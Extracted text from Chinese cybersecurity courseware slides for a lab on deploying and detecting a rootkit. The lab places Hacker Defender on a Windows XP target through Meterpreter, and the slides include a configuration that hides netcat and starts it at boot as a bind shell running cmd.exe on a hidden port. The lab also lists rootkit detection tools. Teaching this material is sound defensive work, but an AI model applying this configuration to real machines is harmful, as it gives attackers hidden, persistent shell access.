网络空间安全技术实践教程课件

,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,2017/4/24,网络空间安全实践教程,#,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,2017/4/24,网络空间安全实践教程,#,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,2017/4/24,网络空间安全实践教程,#,单击此处编辑母版标题样式,单击此处编辑母版文本样式,第二级,第三级,第四级,第五级,2017/4/24,网络空间安全实践教程,#,网络空间安全技术实践教程,吕秋云，王小军，胡耿然，汪云路，王秋华,西安电子科技大学出版社,网络空间安全技术实践教程吕秋云，王小军，胡耿然，汪云路，王秋,第四篇,渗透攻击测试实验篇,第十五章,漏洞利用实验,15.3 Rootkit,利用与检测实验,网络空间安全技术实践教程,2,第四篇 渗透攻击测试实验篇网络空间安全技术实践教程2,15.3 Rootkit,利用与检测实验,实验目的：,了解,Rootkit,的工作原理和功能，熟悉常见,Rootkit,以及,Rootkit,检测工具的使用。,网络空间安全技术实践教程,3,15.3 Rootkit利用与检测实验实验目的：网络空间安全,15.3 Rootkit,利用与检测实验,实验原理：,Rootkit,通常是一组恶意计算机软件的集合，运行于操作系统的底层内核之中。,Rootkit,可以实现多种功能，完成比如隐藏文件、进程以及程序，提权，记录键盘，安装后门等恶意行的任务。,网络空间安全技术实践教程,4,15.3 Rootkit利用与检测实验实验原理：网络空间安全,15.3 Rootkit,利用与检测实验,实验原理：,计算机系统中与用户进行交互的软件，通常其功能是在操作系统中较高层上实现的。当它们执行任务时，经常会向操作系统中较底层的服务发送请求，而,Rootkit,运行于系统底层，可以通过“挂钩”或拦截软件等工具拦截这些请求，并修改系统的正常响应，完成各种恶意目的。,网络空间安全技术实践教程,5,15.3 Rootkit利用与检测实验实验原理：网络空间安全,15.3 Rootkit,利用与检测实验,实验要点说明：（实验难点说明）,Hacker Defender,的配置及使用,Hacker Defender,是一个,Windows Rootkit,，主要包含,3,个文件：,hxdef100.exe,、,hxdef100.ini,、,bdcli100.exe,。,hxdef100.exe,:,在目标计算机上运行,Hacker Defender,bdcli100.exe,:,客户端软件,用于连接后门,Hxdef100.exe,:,配置文件。配置隐藏的文件、文件夹、进程，配置自动运行的程序，配置连接后门的密码等信息。,网络空间安全技术实践教程,6,15.3 Rootkit利用与检测实验实验要点说明：（实验难,15.3 Rootkit,利用与检测实验,实验要点说明：（实验难点说明）,Hacker Defender,的配置及使用,Hidden Table,：要隐藏的文件、文件夹、进程，其中的所有条目对,Windows,资源管理器和文件管理器来说都是隐藏的。,Root Processes,：用来与客户端交互的进程，通常是隐藏的。,Hidden Services,：要隐藏的服务，其中的所有服务都不会出现在服务列表中。,Hidden RegKeys,：要隐藏的注册表条目。,Startup Run,：系统每次启动时运行的程序。,Hidden Ports,：要隐藏的端口号。,。,网络空间安全技术实践教程,7,15.3 Rootkit利用与检测实验实验要点说明：（实验难,15.3 Rootkit,利用与检测实验,实验要点说明：（实验难点说明）,常见,Rootkit,检测工具的使用,网络空间安全技术实践教程,8,15.3 Rootkit利用与检测实验实验要点说明：（实验难,15.3 Rootkit,利用与检测实验,实验准备,： （实验环境，实验先有知识技术说明）,Kali Linux,Hacker Defender,Windows XP,（靶机）,网络空间安全技术实践教程,9,15.3 Rootkit利用与检测实验实验准备： （实验环,15.3 Rootkit,利用与检测实验,实验步骤：,（,1,）配置,hxdef100.ini,文件，利用,Meterpreter,把,Netcat,，,hxdef100.exe,，,hxdef100.ini,上传到目标计算机。,网络空间安全技术实践教程,10,15.3 Rootkit利用与检测实验实验步骤：网络空间安全,15.3 Rootkit,利用与检测实验,实验步骤：,（,1,）,hxdef100.ini,采取的配置如下（这里仅给出了修改的部分）：,网络空间安全技术实践教程,11,Hidden Table,hxdef*,rcmd.exe,rk,nc.exe,Root Processes,hxdef*,rcmd.exe,nc.exe,Startup Run,C:rknc.exe?-Ldp 12345 -e C:WINDOWSsystem32cmd.exe,Hidden Ports,TCP:12345,15.3 Rootkit利用与检测实验实验步骤：网络空间安全,15.3 Rootkit,利用与检测实验,实验步骤：,（,2,）用“,execute f hxdef100.exe,”命令运行,Hacker Defender,，运行后将会根据配置文件进行相关隐藏。,网络空间安全技术实践教程,12,Hacker Defender,运行之前,Hacker Defender,运行之后,15.3 Rootkit利用与检测实验实验步骤：网络空间安全,15.3 Rootkit,利用与检测实验,实验步骤：,（,3,）与留下的后门进行交互。,当,hxdef100.exe,在目标计算机运行后，会尝试在开放的端口上安装后门程序，供,bdcli100.exe,连接。这里假设目标计算机上的,80,端口开放，并且成功地被,hxdef100.exe,安装了后门程序，我们可以运行客户端程序,bdcli00.exe,连接该后门,网络空间安全技术实践教程,13,bdcli100.exe,连接后门,15.3 Rootkit利用与检测实验实验步骤：网络空间安全,15.3 Rootkit,利用与检测实验,实验步骤：,（,4,）,Rootkit,的检测,Rootkit,的手工检测难度较大，需要深入理解操作系统工作原理，这里仅介绍一些常用的,Rootkit,检测工具：,Windows,平台：,GMER,，,Ice Sword,，,Rootkit Revealer,，,Blacklight,等。,Linux,平台：,Rootkit Hunter,，,Chkrootkit,等。,网络空间安全技术实践教程,14,15.3 Rootkit利用与检测实验实验步骤：网络空间安全,15.3 Rootkit,利用与检测实验,实验要求：,使用,Hacker Defender,在,Windows,系统上留取,Rootkit,，并使用,Rootkit,检测工具进行分析和清除。,网络空间安全技术实践教程,15,15.3 Rootkit利用与检测实验实验要求：网络空间安全,15.3 Rootkit,利用与检测实验,实验扩展要求：,学习,Windows,和,Linux,平台下常见的,Rootkit,软件及其使用。,。,网络空间安全技术实践教程,16,15.3 Rootkit利用与检测实验实验扩展要求：网络空间,15.3 Rootkit,利用与检测实验,实验视频：,网络空间安全技术实践教程,17,15.3 Rootkit利用与检测实验实验视频：网络空间安全,